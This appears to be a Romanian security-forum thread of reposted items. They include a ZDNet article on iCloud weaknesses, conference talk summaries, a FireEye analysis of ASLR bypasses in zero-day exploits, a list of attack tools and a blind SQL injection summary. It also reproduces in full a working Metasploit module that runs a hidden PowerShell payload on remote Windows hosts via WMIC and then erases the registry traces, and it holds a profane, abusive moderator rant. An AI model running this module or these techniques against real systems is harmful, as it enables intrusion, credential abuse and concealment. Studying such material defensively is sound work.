Nytro

Da, m-am gandit si eu la aceasta posibilitate, ar fi frumos un research foarte detaliat despre subiect. Iar TrueCrypt nu e singura bucata care ar trebui analizata astfel. As pleca chiar de la kernel (Linux)...

Superb, cu poze, poate macar asa se uita lumea peste el.

Apple's iCloud cracked: Lack of two-factor authentication allows remote data download Summary: Notorious Russian hacker Vladimir Katalov released findings showing Apple's iCloud vulnerable to unauthorized download access, with iCloud data stored on Microsoft and Amazon servers. By Violet Blue for Zero Day | October 21, 2013 (Image: Violet Blue/ZDNet) KUALA LUMPUR, MALAYSIA — Russian security researcher Vladimir Katalov analyzed Apple's secretive iCloud and Find My Phone protocols to discover that neither are protected by two-factor authentication, and iCloud data can be downloaded remotely without a user ever knowing. In "Cracking and Analyzing Apple’s iCloud Protocols," presented to a crowded room at Hack In The Box security conference last Thursday in Kuala Lumpr, Malaysia, Vladimir Katalov revealed that user information and data is not as inaccessible as Apple is telling the public. Katalov's findings appear to support his emphatic statement that Apple can access data it claims to not be able to access. A malicious attacker only needs an Apple ID and password to perform remote iCloud backups — and do not need the user's linked devices. He explained that there is no way for a user to encrypt their iCloud backups. The data is encrypted, he explained, but the keys are stored with the data. Katalov added that Apple holds the encryption keys. Katalov told ZDNet he was shocked to discover that in addition to all of these security chain issues, Apple's iCloud data is stored on Microsoft and Amazon servers. Katalov's presentation pointed out that because Apple provides full request information to its third-party storage providers (Amazon and Microsoft), Apple could provide this data to law enforcement. In Apple's July public statement on the NSA PRISM surveillance program, Apple denied any backdoor server access for government agencies. Apple unequivocally stated, "Apple does not give law enforcement access to its servers." When a user performs an iCloud backup download, they receive an email informing the user that the process is complete. Katalov discovered that when a remote download is performed, the user receives no notification email. If a user's data is accessed and downloaded from iCloud by a remote third party, they would not know. Katalov's work represents the first time anyone has analyzed and publicly presented findings on Apple's secretive iCloud protocol. Vladimir Katalov analyzed Apple's iCloud and Find My Phone protocols by sniffing http traffic on jailbroken devices — though he was careful to explain that a user's devices do not need to be jailbroken for a malicious entity to exploit the remote backup protocol security omissions Katalov discovered. Analyzing the traffic, he told the crowded room during his Thursday presentation, was not difficult. Apple's iCloud data is comprised of what a user stores as a data backup. It contains documents, Dropbox files and sensitive user data. In his analysis, Katalov discovered that iCloud files are stored as a container — plist and content — in a files-to-chunks mapping schema. But he found that Apple's two-factor authentication, a layer of user security used in addition to a username and password, is not used for iCloud backups (or Find My Phone). (Image: Violet Blue/ZDNet) Apple's two-step authentication ("2FA") does not protect iCloud backups, Find My Phone data and the documents stored in the cloud. Katalov details this further in a blog post: "Apple Two-Factor Authentication and the iCloud." Katalov showed Hack In The Box attendees that with simple queries, it's possible to get the authentication token for accessing the iCloud backup, backup IDs, and the encryption keys. Then one can download the files from where they're stored in Windows Azure or Amazon AWS. ZDNet caught up with Katalov after his presentation to find out more. When asked if he had presented his discoveries to Apple, he explained that his findings were the results of protocol analysis — and are not a vulnerability. Put another way, the iCloud security hole falls into the "it's a feature, not a bug" category. (Image: Violet Blue/ZDNet) When ZDNet asked Katalov if there was a way for Apple to fix this issue — such as extending two-factor authentication to its iCloud and Find My Phone services — he shook his head and told us that Apple's implementation of two-factor auth was likely "only an afterthought." Katalov told ZDNet the best thing a user can to do to protect their iCloud data is to simply not use iCloud. However, Katalov told us he still uses Apple's iCloud as a backup service. "It is not exactly safe, but I am selecting between security and privacy," he said. It's easy to argue that because a remote attacker needs an Apple user ID and password, the data is still out of reach to most malicious entities. However, obtaining Apple user IDs and passwords isn't impossible — aside from email phishing techniques, which are more effective than most would believe. Social engineering techniques are sadly common and also very effective. A recent example is the spate of Apple ID data thefts in Norway. This past February, a significant number of teenage girls were targeted by boys who easily surmised the girl's user ID and password recovery information to gain access to their Apple accounts, download photos and the girls' data — which, sadly, ended up pass around and also sold online. In his Hack In The Box presentation, Katalov told the audience that he was also surprised to discover that when a user shuts off location tracking services, the user's location is still stored for around 3-6 hours. We wondered if this is what led Katalov to mention that next he will analyze Touch ID protocol and storage — as soon as iOS 7 is jailbroken, he told ZDNet. "Apple says it never sends the information, and it is never copied to local [storage]" he added, "but I am not so sure." ZDNet asked why Katalov felt this way, when Apple specifically states that it does not transmit Touch ID information. Katalov's eyes glittered, and a boyish smile crept across his face. In his thick Russian accent he replied, "Trust no one." ZDNet has contacted Apple for comment and will update this article if Apple responds. Sursa: Apple's iCloud cracked: Lack of two-factor authentication allows remote data download | ZDNet

Windows Management Instrumentation (WMI) Remote Command Execution Authored by Ben Campbell | Site metasploit.com This Metasploit module executes powershell on the remote host using the current user credentials or those supplied. Instead of using PSEXEC over TCP port 445 we use the WMIC command to start a Remote Procedure Call on TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel traffic through that session. The result is similar to psexec but with the added benefit of using the session's current authentication token instead of having to know a password or hash. We do not get feedback from the WMIC command so there are no indicators of success or failure. The remote host must be configured to allow remote Windows Management Instrumentation. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell def initialize(info={}) super( update_info( info, 'Name' => 'Windows Management Instrumentation (WMI) Remote Command Execution', 'Description' => %q{ This module executes powershell on the remote host using the current user credentials or those supplied. Instead of using PSEXEC over TCP port 445 we use the WMIC command to start a Remote Procedure Call on TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel traffic through that session. The result is similar to psexec but with the added benefit of using the session's current authentication token instead of having to know a password or hash. We do not get feedback from the WMIC command so there are no indicators of success or failure. The remote host must be configured to allow remote Windows Management Instrumentation. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' ], 'References' => [ [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) [ 'OSVDB', '3106'], [ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'WfsDelay' => '15', }, 'DisclosureDate' => 'Jan 01 1999', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'DefaultTarget' => 0 )) register_options([ OptString.new('SMBUser', [ false, 'The username to authenticate as' ]), OptString.new('SMBPass', [ false, 'The password for the specified username' ]), OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication' ]), OptAddressRange.new("RHOSTS", [ true, "Target address range or CIDR identifier" ]), # Move this out of advanced OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']) ]) end def exploit if datastore['SMBUser'] and datastore['SMBPass'].nil? fail_with(Failure::BadConfig, "Need both username and password set.") end Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server| # TODO: CHECK WMIC Access by reading the clipboard? # TODO: wmic /output:clipboard # TODO: Needs to be meterpreter ext side due to threading # Get the PSH Payload and split it into bitesize chunks # 1024 appears to be the max value allowed in env vars psh = cmd_psh_payload(payload.encoded).gsub("\r\n","") psh = psh[psh.index("$si")..psh.length-1] chunks = split_code(psh, 1024) begin print_status("[#{server}] Storing payload in environment variables") env_name = rand_text_alpha(rand(3)+3) env_vars = [] 0.upto(chunks.length-1) do |i| env_vars << "#{env_name}#{i}" c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\" /m" wmic_command(server, c) end x = rand_text_alpha(rand(3)+3) exec_cmd = "powershell.exe -nop -w hidden -c $#{x} = ''" env_vars.each do |env| exec_cmd << "+$env:#{env}" end exec_cmd << ";IEX $#{x};" print_status("[#{server}] Executing payload") wmic_command(server, exec_cmd) print_status("[#{server}] Cleaning up environment variables") env_vars.each do |env| cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f" wmic_command(server, cleanup_cmd) end rescue Rex::Post::Meterpreter::RequestError => e print_error("[#{server}] Error moving on... #{e}") next ensure select(nil,nil,nil,2) end end end def wmic_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass']) userpass = "" unless user.nil? if domain.nil? userpass = "/user:\"#{user}\" /password:\"#{pass}\" " else userpass = "/user:\"#{domain}\\#{user}\" /password:\"#{pass}\" " end end return userpass end def wmic_command(server, cmd) wcmd = "wmic #{wmic_user_pass_string}/node:#{server} process call create \"#{cmd.gsub('"','\\"')}\"" vprint_status("[#{server}] #{wcmd}") # We dont use cmd_exec as WMIC cannot be Channelized ps = session.sys.process.execute(wcmd, "", {'Hidden' => true, 'Channelized' => false}) select(nil,nil,nil,0.1) end def split_code(psh, chunk_size) array = [] idx = 0 while (idx < psh.length) array << psh[idx, chunk_size] idx += chunk_size end return array end end Sursa: Windows Management Instrumentation (WMI) Remote Command Execution ? Packet Storm

[h=2]stresslinux[/h] [h=2]Welcome to stresslinux[/h] [h=3]What is stresslinux[/h] stresslinux is a minimal linux distribution running from a bootable cdrom, usb, vmware or via PXE (wip). stresslinux makes use of some utitlities available on the net like: stress, cpuburn, hddtemp, lm_sensors ... stresslinux is dedicated to users who want to test their system(s) entirely on high load and monitoring the health. [h=3]Who needs it[/h] Stresslinux is for people (system builders, overclockers) who want to test their hardware under high load and monitor stability and thermal environment. You should be familiar with linux console because stresslinux comes without a graphical user interface. [h=3]Where to start[/h] Downloads Docs: FAQ, Documentation, Software Community: Forum, Reviews, ?Facebook, ?Google+ [h=3]Screenshots[/h] [h=3]You like stresslinux and want to say thanks[/h] Sursa: Stresslinux

Hack3rcon 4 - Character Assassination: Fun And Games With Unicode - Adrian Crenshaw Description: This talk will cover some of the general security considerations of Unicode. Homoglyph attacks, punycode, shellcode, stego, etc. Adrian Crenshaw Adrian Crenshaw has worked in the IT industry for the last fifteen years. He runs the information security website Irongeek.com, which specializes in videos and articles that illustrate how to use various pen-testing and security tools. He did the cert chase for awhile (MCSE NT 4, CNE, A+, Network+. i-Net+) but stopped once he had to start paying for the tests himself. He's currently working on a Masters in Security Informatics, and is interested in obtaining a network security/research/teaching job in academia (though he's beginning to think that the corporate world has a better grasp on ethics/academic freedom). He is also one of the co-founders of Derbycon. For More Information please visit : - Hack3rCon^4 - Eye of the Storm Hack3rcon 4 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Hack3rcon 4 - Character Assassination: Fun And Games With Unicode - Adrian Crenshaw

Hack3rcon 4 - Ms08-067 Under The Hood - John Degruyter Description: The purpose of this talk is to get a better understanding of using a debugger and looking at the low-level process of exploiting a software vulnerability. We will be visiting our faithful old friend, ms08_067. First, we will look at the structure of the metasploit module and the functions that make it up. Then we will move to the victim’s system where we will be firing up a debugger and taking a look at the vulnerable process, library and function. Next, we will launch the metasploit module from our attack system and watch the memory corruption. Finally, we’ll follow the exploit as it disables DEP in the acgenral.dll module and then finally jump to our shellcode for a win. Speakers John Degruyter For More Information please visit : - Hack3rCon^4 - Eye of the Storm Hack3rcon 4 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Hack3rcon 4 - Ms08-067 Under The Hood - John Degruyter

Hack3rcon 4 - Advanced Evasion Techniques - Pwning The Next Generation Security Products (Keynote) - David Kennedy Description: We know anti-virus is dead, there's no more beating it with a stick and it's easy to get around. What about the next set of security products and how do they actually work. Preventive technology is advancing and the attacks are getting slightly harder (albeit not much). This talk goes into advanced evasion techniques for getting around some of the new pieces of technology that we face out there. Everything from Next Generation technologies, virtualization technologies, application firewalls, and more - this talk will show how to effectively test and identify how to best get around what we're seeing out there. It's time to pwn the next generation of security product lines. David Kennedy (@dave_rel1k) is founder and principal security consultant of TrustedSec - An information security consulting firm located in Cleveland Ohio. David was the former Chief Security Officer (CSO) for a Fortune 1000 where he ran the entire information security program. Kennedy is a co-author of the book "Metasploit: The Penetration Testers Guide," the creator of the Social-Engineer Toolkit (SET), and Artillery. Kennedy has presented on a number of occasions at Black Hat, Defcon, ShmooCon, BSIDES, Infosec World, Notacon, AIDE, ISACA, ISSA, Infragard, Infosec Summit, Hack3rCon and a number of other security-related conferences. Kennedy has been interviewed by several news organizations including CNN, Fox News, and BBC World News. Kennedy was formally on the Back|Track development team and Exploit-DB team and co-host of the Social-Engineer.org podcast. Kennedy is one of the co-authors of the Penetration Testing Execution Standard (PTES); a framework designed to fix the penetration testing industry. Kennedy is the co-founder of DerbyCon, a large-scale conference in Louisville Kentucky. Prior to Diebold, Kennedy was a VP of Consulting and Partner of a mid-size information security consulting company running the security consulting practice. Prior to the private sector, Kennedy worked for the United States Marine Corps and deployed to Iraq twice for intelligence related missions. For More Information please visit : - Hack3rCon^4 - Eye of the Storm Hack3rcon 4 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Hack3rcon 4 - Advanced Evasion Techniques - Pwning The Next Generation Security Products (Keynote) - David Kennedy

S-a rezolvat problema...

Tocmai pentru a preveni milogi ca tine era inchisa. Ban.

Ban. Fara milogeli azi.

Super. Noi, muritori de rand, nu putem face mare lucru. Dar daca isi pun pe cap o gramada de state, poate o sa se faca ceva.

Da, spam. Te invarti cu masina prin oras si trimiti mesaje in disperare.

[h=1]iLikeIT. Cum sa-ti creezi propria retea de telefonie mobila, ca sa ceri ajutor dupa un cutremur[/h]Dupa cum se stie, in cazul producerii unui cutremur cu magnitudine mare, cad retelele de electricitate si cele de telefonie. Si atunci, cum facem sa transmitem un mesaj de urgenta catre salvatori daca ramanem blocati intr-un loc? Solutia este destul de simpla si a fost prezentata la iLikeIT cu ajutorul lui Bogdan Alecu, specialist in securitate mobila. Mai multe detalii la adresa: http://www.m-sec.net Trebuie precizat de la bun inceput ca este ilegal sa va creati propria retea de telefonie mobila, iar aceasta solutie trebuie aplicata numai in cazuri de extrema urgenta. Aparatura de care aveti nevoie este urmatoarea: un laptop, un stick USB pe care se afla un soft special si un telefon simplu, indiferent de model si indiferent cat de vechi este acesta. In cazul in care nu mai exista retea de electricitate, laptopul il puteti folosi datorita bateriei incorporate. Telefonul se conecteaza la laptop cu ajutorul unui banal cablu de date. De asemenea, softul de pe stickul USB nu trebuie instalat, el poate fi rulat direct de pe dispozitivul mobil. Iata cateva detalii: 1. Sistemul de operare este Ubuntu, iar pe el a fost instalat softul care controleaza toata reteaua de telefonie. Acest soft se numeste OpenBTS si poate fi descarcat gratuit de la aceasta adresa. 2. Tot sistemul de operare a fost instalat pe un stick USB si a rulat de pe acesta 3. Intregul sistem poate fi configurat sa ruleze si sa porneasca automat, inclusiv de pe un notebook care nu este pretentios la cerinte (4GB RAM, port USB 2.0, procesor dual-core) Telefonul folosit pe post de statie emisie-receptie este un Motorola C123 conectat prin USB pe care OpenBTS incarca propriul firmware. Cu alte cuvinte, pe acest telefon se incarca un alt sistem de operare open-source, iar frecventa de emisie precum si celelalte informatii privind modalitatea de operare sunt controlate de catre OpenBTS. 4. Desigur ca, in locul acestui telefon, se poate utiliza o antena GSM cu amplificator, pentru a acoperi o suprafata mai mare. 5. Noua retea creata poate fi folosita atat pentru a trimite mesaje de avertizare, cat si in scop de localizare a eventualelor victime. Fiind o retea ce permite controlul total din partea utilizatorului, se poate folosi aceasta modalitate portabila pentru a localiza victimele. Astfel, se poate limita puterea de emisie, dar si distanta pe care emite (in pasi de cate 500m), iar in momentul in care un telefon nou se inregistreaza in retea, operatorul e instiintat de acest lucru. Astfel, reduci aria de cautare doar in acea zona limitata de pana in 500m. 6. Ca sa inteleaga toata lumea, ideea este urmatoarea: nu conteaza daca toti operatorii de telefonie mobila din Romania nu functioneaza in acel moment. In momentul in care va creati propria retea de telefonie, celelalte telefoane care se afla atunci in reteaua de acoperire vor vedea automat reteaua voastra proprie si se vor conecta la ea. 7. De asemenea, nu conteaza daca telefonul este codat intr-o anumita retea de telefonie: Vodafone, Orange, Cosmote sau Digi. Sursa si video: iLikeIT. Cum sa-ti creezi propria retea de telefonie mobila, ca sa ceri ajutor dupa un cutremur Asta se poate face util. Veniti voi cu idei pentru facut rahaturi

"from people's online email address books and instant messaging (IM) "buddy lists" Asta e urat si nu e legal. Insa de cele mai multe ori adresele de mail sunt facute prea publice.

Tutorial: "Cum sa iei ban"

ASLR Bypass Apocalypse in Recent Zero-Day Exploits October 15, 2013 | By Xiaobo Chen ASLR (Address Space Layout Randomization) is one of the most effective protection mechanisms in modern operation systems. But it’s not perfect. Many recent APT attacks have used innovative techniques to bypass ASLR bypass techniques. Here are just a few interesting bypass techniques that we have tracked in the past year: Using non-ASLR modules Modifying the BSTR length/null terminator Modifying the Array object The following sections explain each of these techniques in detail. Non-ASLR modules Loading a non-ASLR module is the easiest and most popular way to defeat ASLR protection. Two popular non-ASLR modules are used in IE zero-day exploits: MSVCR71.DLL and HXDS.DLL. MSVCR71.DLL, JRE 1.6.x is shipped an old version of the Microsoft Visual C Runtime Library that was not compiled with the /DYNAMICBASE option. By default, this DLL is loaded into the IE process at a fixed location in the following OS and IE combinations: Windows 7 and Internet Explorer 8 Windows 7 and Internet Explorer 9 HXDS.DLL, shipped from MS Office 2010/2007, is not compiled with ASLR. This technique was first described in here, and is now the most frequently used ASLR bypass for IE 8/9 on Windows 7. This DLL is loaded when the browser loads a page with ‘ms-help://’ in the URL. The following zero-day exploits used at least one of these techniques to bypass ASLR: CVE-2013-3893, CVE2013-1347, CVE-2012-4969, CVE-2012-4792. Limitations The non-ASLR module technique requires IE 8 and IE 9 to run with old software such as JRE 1.6 or Office 2007/2010. Upgrading to the latest versions of Java/Office can prevent this type of attack. Modify the BSTR length/null terminator This technique first appears in the 2010 Pwn2Own IE 8 exploit by Peter Vreugdenhil. It applies only to specific types of vulnerabilities that can overwrite memory, such as buffer overflow, arbitrary memory write, and increasing or decreasing the content of a memory pointer. The arbitrary memory write does not directly control EIP. Most of the time, the exploit overwrites important program data such as function pointers to execute code. For attackers, the good thing about these types of vulnerabilities is that they can corrupt the length of a BSTR so that using the BSTR can access memory outside of its original boundaries. Such accesses may disclose memory addresses that can be used to pinpoint libraries suitable for ROP. Once the exploit has bypassed ASLR in this way, it can then use the same memory corruption bug to control EIP. Few vulnerabilities can be used to modify the BSTR length. For example, some vulnerabilities can only increase/decrease memory pointers by one or two bytes. In this case, the attacker can modify the null terminator of a BSTR to concatenate the string with the next object. Subsequent accesses to the modified BSTR have the concatenated object’s content as part of BSTR, where attackers can usually find information related to DLL base addresses. CVE-2013-0640 The Adobe XFA zero-day exploit uses this technique to find the AcroForm.api base address and builds a ROP chain dynamically to bypass ASLR and DEP. With this vulnerability, the exploit can decrease a controllable memory pointer before calling the function pointer from its vftable: Consider the following memory layout before the DEC operation: [string][null][non-null data][object] After the DEC operation (in my tests, it is decreased twice) the memory becomes: [string][\xfe][non-null data][object] For further details, refer to the technique write-up from the immunityinc’s blog. Limitations This technique usually requires multiple writes to leak the necessary info, and the exploit writer has to carefully craft the heap layout to ensure that the length field is corrupted instead of other objects in memory. Since IE 9, Microsoft has used Nozzle to prevent heap spraying/fengshui, so sometimes the attacker must use the VBArray technique to craft the heap layout. Modify the Array object The array object length modification is similar to the BSTR length modification: they both require a certain class of “user-friendly” vulnerabilities. Even batter, from the attacker’s view, is that once the length changes, the attacker can also arbitrarily read from or write to memory — or basically take control of the whole process flow and achieve code execution. Here is the list of known zero-day exploits using this technique: CVE-2013-0634 This exploit involves Adobe Flash player regex handling buffer overflow. The attacker overwrites the length of a Vector.<Number> object, and then reads more memory content to get base address of flash.ocx. Here’s how the exploit works: Set up a continuous memory layout by allocating the following objects”: Free the <Number> object at index 1 of the above objects as follows: obj[1] = null; Allocate the new RegExp object. This allocation reuses memory in the obj[1] position as follows: boom = "(?i)()()(?-i)||||||||||||||||||||||||"; var trigger = new RegExp(boom, ""); Later, the malformed expression overwrites the length of aVector.<Number> object in obj[2] to enlarge it. With a corrupted size, the attacker can use obj[2] to read from or write to memory in a huge region to locate the flash.ocx base address and overwrite a vftable to execute the payload. CVE-2013-3163 This vulnerability involves a IE CBlockContainerBlock object use-after-free error. This exploit is similar to CVE-2013-0634, but more sophisticated. Basically, this vulnerability modifies the arbitrary memory content using an OR instruction. This instruction is something like the following: or dword ptr [esi+8],20000h Here’s how it works: First, the attacker sprays the target heap memory with Vector.<uint> objects as follows:. After the spray, those objects are stored aligned in a stable memory address. For example: The first dword, 0x03f0, is the length of the Vector.<uint> object, and the yellow marked values correspond to the values in above spray code. If the attacker sets the esi + 8 point to 0x03f0, the size becomes 0x0203f0 after the OR operation — which is much larger than the original size. With the larger access range, the attacker can change the next object length to 0x3FFFFFF0. From there, the attacker can access the whole memory space in the IE process. ASLR is useless because the attacker can retrieve the entire DLL images for kernel32/NTDLL directly from memory. By dynamically searching for stack pivot gadgets in the text section and locating the ZwProtectVirtualMemory native API address from the IAT, the attacker can construct a ROP chain to change the memory attribute and bypass the DEP as follows: By crafting the memory layout, the attacker also allocates a Vector.<object> that contains the flash.Media.Sound() object. The attacker uses the corrupted Vector.<uint> object to search the sound object in memory and overwrite it’s vftable to point to ROP payload and shellcode. CVE-2013-1690 The use-after-free vulnerability in Firefox’s DocumentViewerImpl object allows the user to write a word value 0×0001 into an arbitrary memory location as follows: In above code, all the variables that start with “m” are read from the user-controlled object. If the user can set the object to meet the condition in the second “if” statement, it forces the code path into the setImageAnimationMode() call, where the memory write is triggered. Inside the setImageAnimationMode(), the code looks like the following: In this exploit, the attacker tries to use ArrayBuffer to craft the heap layout. In the following code, each ArrayBuffer element for var2 has the original size 0xff004. After triggering the vulnerability, the attacker increases the size of the array to to 0x010ff004. The attacker can also locate this ArrayBuffer by comparing the byteLength in JavaScript. Then, the attacker can read to or write from memory with the corrupted ArrayBuffer. In this case, the attacker choose to disclosure the NTDLL base address from SharedUserData (0x7ffe0300), and manually hardcoded the offset to construct the ROP payload. CVE-2013-1493 This vulnerability involves a JAVA CMM integer overflow that allows overwriting the array length field in memory. During exploitation, the array length actually expands to 0x7fffffff, and the attacker can search for the securityManager object in memory and null it to break the sandbox. This technique is much more effective than overwriting function pointers and dealing with ASLR/DEP to get native code execution. The Array object modification technique is much better than other techniques. For the Flash ActionScript vector technique, there are no heap spray mitigations at all. As long as you have a memory-write vulnerability, it is easily implemented. Summary The following table outlines recent APT zero-day exploits and what bypass techniques they used: Conclusion ASLR bypassing has become more and more common in zero-day attacks. We have seen previous IE zero-day exploits using Microsoft Office non-ASLR DLL to bypass it, and Microsoft also did some mitigation in their latest OS and browser to prevent use of the non-ASLR module to defeat ASLR. Because the old technique will no longer work and can be easily detected, cybercriminals will have to use the advanced exploit technique. But for specific vulnerabilities that allow writing memory, combining the Vector.<uint> and Vector.<object> is more reliable and flexible. With just one shot, extending the exploit from writing a single byte to reading or writing gigabytes is easy and works for the latest OS and browser regardless of the OS, application, or language version. Many researchers have published research on ASLR bypassing, such as Dion Blazakis’s JIT spray and Yuyang’s LdrHotPatchRoutine technique. But so far we haven’t seen any zero-day exploit leveraging them in the wild. The reason could be that these techniques are generic approaches to defeating ASLR. And they are usually fixed quickly after going public. But there is no generic way to fix vulnerability-specific issues. In the future, expect more and more zero-day exploits using similar or more advanced techniques. We may need new mitigations in our OSs and security products to defeat them. Thanks again to Dan Caselden and Yichong Lin for their help with this analysis. Sursa: ASLR Bypass Apocalypse in Recent Zero-Day Exploits | FireEye Blog

Salut, Au aparut niste probleme cu categoriile Offtopic, Cereri si Ajutor (+ altele). Se pare ca nu se mai pot deschide topicuri noi in acele categorii. Nici macar nu se mai poate posta. Promit ca maine seara voi rezolva problema. Pana atunci invatati un singur lucru: NU MAI FITI MILOGI. Tot urmaresc forumul si sper sa vad macar 2-3 persoane care ies in fata si demonstreaza ca au mentalitate si ca vor sa ajute comunitatea. Dar fiecare isi vede de propria persoana, nimeni nu ar posta ceva util pentru ceilalti din comunitate. Daca veti verifica si voi ultimele posturi veti vedea categoriile principale de discutii: Offtopic, Cereri si Ajutor. Stiti sa cereti ajutorul, sa intindeti mana, dar nu stiti sa ajutati la randul vostru. Cersetori, milogi, asta sunteti. Asadar, 24 de ore, deocamdata, nu veti putea posta in acele categorii. Aduceti o contributie si voi. Faceti ceva util si pentru ceilalti, nu doar pentru voi. Daca nu va convine decizia va dati cu curul de pamant si imi sugeti pula. Muie.

Tools FreeRDP-pth (20/10/2013) - FreeRDP-pth is a slightly modified version of FreeRDP that tries to authenticate using a password hash instead of a password. This work only against RDP v8.1 servers (Windows 2012 R2 at the time of writing) and even then, only for members of the administrators groups. Refer to companion blog post for more information about Restricted Mode and pass-the-hash. UDP Protocol Analysis – Interactive Python Tool (9/9/2013) - UDP protocol analysis is a python module which can be used in scripted analysis or interactively using ipython. Local MySQL Password Bruteforcer (15/2/2013) - Local MySQL Password Bruteforcer is a python script to assess the strength of the local MySQL access passwords. HeaderCheck (15/2/2013) - HeaderCheck is a python script used to check the security settings of various headers returned by web servers. ssl-cipher-suite-enum (13/2/2013) - ssl-cipher-suite-enum is a perl script to enumerate supported SSL cipher suites supported by network services (principally HTTPS). UNIXSocketScanner (31/1/2013) - UNIXSocketScanner is a perl script to locally enumerate UNIX domain sockets. get-dhcp-opts (12/12/2012) - get-dhcp-opts is a tool to discover DHCP/BOOTP servers on your LAN, and dump the DHCP/BOOTP options. VulnApp (15/9/2012) - VulnApp is a vulnerable web application written in ASP.net. rdp-sec-check (15/7/2012) - rdp-sec-check is a perl script to enumerate security settings of an RDP Service (AKA Terminal Services). nopc (3/7/2012) - nopc is a Nessus based UNIX patch checker. It utilises Nessus’ nasls and instructs you on what data you need to manually get from the system to perform that patch check. This was developed for situation when network connectivity to the systems under review is not possible. secdump (24/3/2012) - secdump is a simple meterpreter module that uploads and runs gsecdump. Nothing fancy, just a time saver. SSHatter (16/2/2011) - SSHatter is a perl script to perform brute force attacks on SSH. hoppy (9/10/2009) - hoppy is python script to probe HTTP options and perform scanning for information disclosure issues. ManySSL (9/12/2008) - ManySSL is a perl script to enumerate supported SSL cipher suites supported by network services (principally HTTPS). udp-proto-scanner (26/11/2008) - udp-proto-scanner is a perl script which discovers UDP services by sending triggers to a list of hosts MS08-067 check (18/11/2008) - MS08-067 check is python script which can anonymously check if a target machine or a list of target machines are affected by MS08-067 vulnerability. polenum (30/10/2008) - polenum is a python script which can be used to get the password policy from a Windows machine. vessl (30/10/2008) - vessl is a bash script that can fetch and verify the SSL certificate of a remote server. enum4linux (16/9/2008) - A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts. phrasen|drescher (27/6/2008) - A tool for bruteforce guessing pass phrases, password hashes or remote accounts of various services. BSQL brute forcer V2 (18/6/2008) - Updated version of the Blind SQL Injection Brute Forcer from www.514.es. Works against PostgreSQL, MySQL, MSSQL and Oracle and supports custom SQL queries. acccheck (9/4/2008) - The tool is designed as a password dictionary attack tool that targets windows authentication via the SMB protocol. It is really a wrapper script around the ‘smbclient’ binary, and as a result is dependent on it for its execution. MIBparse (7/4/2008) - MIBparse.pl has been designed as an offline parser to quickly parse output from SNMP tools such as ‘snmpwalk’. nbtscan-1.5.2 (3/4/2008) - NBTscan is a program for scanning IP networks for NetBIOS name information. XSS Tunnel (2/4/2008) - XSS Tunnel is a standard HTTP proxy which sits on an attacker’s system. Any tool that is configured to use it will tunnel its traffic through the active XSS Channel on the XSS Shell server. Banner Grab (2/4/2008) - BannerGrab is a tool that performs connection, trigger-based and basic information collection from network services. viewstate (2/4/2008) - Viewstate is an ASP.Net viewstate decoder, checker, parser and encoder. Sun Patch Check (2/4/2008) - Sun Patch Check lists missing security patches by comparing the output from the Sun Solaris “showrev” command to that from the Sun recommended patch list. XSS Shell (2/4/2008) - XSS Shell is a powerful XSS backdoor, in XSS Shell one can interactively send requests and get responses from victim and it allows you to keep the control of session. sucrack (31/3/2008) - sucrack is a multithreaded Linux/UNIX tool for brute-force cracking local user accounts via su. rmiInfo (31/3/2008) - A tool for extracting information from Java Remote Method Invocation (RMI) services. onesixtyone (31/3/2008) - An enhanced version of Solar Eclipse’s SNMP Community string guessing tool. http-dir-enum (28/3/2008) - A command-line tool for bruteforce-guessing directory and filenames on web servers. BSQL Hacker (16/1/2008) - BSQL (Blind SQL) Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities virtually in any database. Sursa: http://labs.portcullis.co.uk/tools/

[h=1]Deep Blind SQL Injection[/h] Deep Blind SQL Injection is a new way to exploit Blind SQL Injections with a 66% reduction in the number of requests. However it is still possible to retrieve data, moreover it is possible with a 66% reduction in the number of requests made of the server, requiring two rather than six requests to retrieve each char. Ferruh Mavituna www.portcullis-security.com Blind SQL Injection attacks are described in several papers1. If the injection point is completely blind2 then the only way3 to extract data is using time based attacks like WAITFOR DELAY, BENCHMARK etc. When it comes to reading data there are two known ways, 1. Reading data bit by bit 2. Reading data through a binary search algorithm with character patterns Both methods have a one request – one response limit and on average for each char you need to make six requests to the server. In Deep Blind SQL Injection reading data is more complex than in classic blind injection. However it is still possible to retrieve data, moreover it is possible with a 66% reduction in the number of requests made of the server, requiring two rather than six requests to retrieve each char. Deep Blind SQL Injection works well within MS SQL Server and may work in other databases such as like ORACLE, PostgreSQL etc. This method of injection, which retrieves more that one response per request is achieved using time delay differences. For example if the first half byte of char is 6, the database is going to wait for 12 seconds, if second half byte of char is 1 it?s going to wait for 2 seconds. An attacker should store server response times and divide them by 2 to understand the response. Finally, in 2 requests we got 0x61 which is „a?. Obviously depending on the condition it?s possible to use larger or smaller dividers than 2. Download: http://labs.portcullis.co.uk/download/Deep_Blind_SQL_Injection.pdf

